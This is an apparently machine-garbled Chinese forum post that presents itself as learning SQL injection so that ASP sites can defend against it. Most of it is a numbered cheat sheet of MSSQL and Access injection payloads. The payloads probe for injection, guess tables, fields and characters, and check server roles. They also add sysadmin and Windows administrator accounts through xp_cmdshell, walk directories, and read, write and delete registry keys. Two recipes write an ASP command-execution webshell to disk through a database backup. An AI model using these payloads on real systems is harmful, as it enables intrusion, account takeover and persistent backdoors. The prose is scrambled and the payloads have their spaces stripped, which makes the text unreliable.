|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
由于ASP还是一种Script语言所没除了大量使用组件外,没有办法提高其工作效率。它必须面对即时编绎的时间考验,同时我们还不知其背后的组件会是一个什么样的状况;进修一下注进技能也何尝不是件功德,亲信知彼嘛。能够更无效的避免注进,让网站加倍平安1.判别是不是有注进
;and1=1
;and1=2
2.开端判别是不是是mssql
;anduser>0
3.注进参数是字符
and[查询前提]and=
4.搜刮时没过滤参数的
and[查询前提]and%25=
5.判别数据库体系
;and(selectcount(*)fromsysobjects)>0mssql
;and(selectcount(*)frommsysobjects)>0access
6.猜数据库
;and(SelectCount(*)from[数据库名])>0
7.猜字段
;and(SelectCount(字段名)from数据库名)>0
8.猜字段中纪录长度
;and(selecttop1len(字段名)from数据库名)>0
9.(1)猜字段的ascii值(access)
;and(selecttop1asc(mid(字段名,1,1))from数据库名)>0
(2)猜字段的ascii值(mssql)
;and(selecttop1unicode(substring(字段名,1,1))from数据库名)>0
10.测试权限布局(mssql)
;and1=(SELECTIS_SRVROLEMEMBER(sysadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(serveradmin));--
;and1=(SELECTIS_SRVROLEMEMBER(setupadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(securityadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(diskadmin));--
;and1=(SELECTIS_SRVROLEMEMBER(bulkadmin));--
;and1=(SELECTIS_MEMBER(db_owner));--
11.增加mssql和体系的帐户
;execmaster.dbo.sp_addloginusername;--
;execmaster.dbo.sp_passwordnull,username,password;--
;execmaster.dbo.sp_addsrvrolemembersysadminusername;--
;execmaster.dbo.xp_cmdshellnetuserusernamepassword/workstations:*/times:all/passwordchg:yes/passwordreq:yes/active:yes/add;--
;execmaster.dbo.xp_cmdshellnetuserusernamepassword/add;--
;execmaster.dbo.xp_cmdshellnetlocalgroupadministratorsusername/add;--
12.(1)遍历目次
;createtabledirs(pathsvarchar(100),idint)
;insertdirsexecmaster.dbo.xp_dirtreec:
;and(selecttop1pathsfromdirs)>0
;and(selecttop1pathsfromdirswherepathsnotin(上步失掉的paths))>)
(2)遍历目次
;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
;inserttempexecmaster.dbo.xp_availablemedia;--取得以后一切驱动器
;insertintotemp(id)execmaster.dbo.xp_subdirsc:;--取得子目次列表
;insertintotemp(id,num1)execmaster.dbo.xp_dirtreec:;--取得一切子目次的目次树布局
;insertintotemp(id)execmaster.dbo.xp_cmdshelltypec:webindex.asp;--检察文件的内容
13.mssql中的存储历程
xp_regenumvalues注册表根键,子键
;execxp_regenumvaluesHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun以多个纪录集体例前往一切键值
xp_regread根键,子键,键值名
;execxp_regreadHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,CommonFilesDir前往制订键的值
xp_regwrite根键,子键,值名,值范例,值
值范例有2种REG_SZ暗示字符型,REG_DWORD暗示整型
;execxp_regwriteHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,
TestValueName,reg_sz,hello写进注册表
xp_regdeletevalue根键,子键,值名
execxp_regdeletevalueHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersion,TestValueName删除某个值
xp_regdeletekeyHKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionTestkey删除键,包含该键下一切值
14.mssql的backup创立webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values(<%DimoScript%>);
backupdatabasemodeltodisk=c:l.asp;
15.mssql内置函数
;and(select@@version)>0取得Windows的版本号
;anduser_name()=dbo判别以后体系的毗连用户是否是sa
;and(selectuser_name())>0爆以后体系的毗连用户
;and(selectdb_name())>0失掉以后毗连的数据库
16.简便的webshell
usemodel
createtablecmd(strimage);
insertintocmd(str)values(<%=server.createobject("wscript.shell").exec("cmd.exe/c"&request("c")).stdout.readall%>);
backupdatabasemodeltodisk=g:wwwtestl.asp
源代码保护方面其实现在考虑得没那么多了..NET也可以反编译.ASP写得复杂的话别人能看得懂的话.他也有能力自己写了.这方面担心的倒不太多.纵观现在网上可以下载的那些所谓BBS还有什么网站等等的源代码 |
|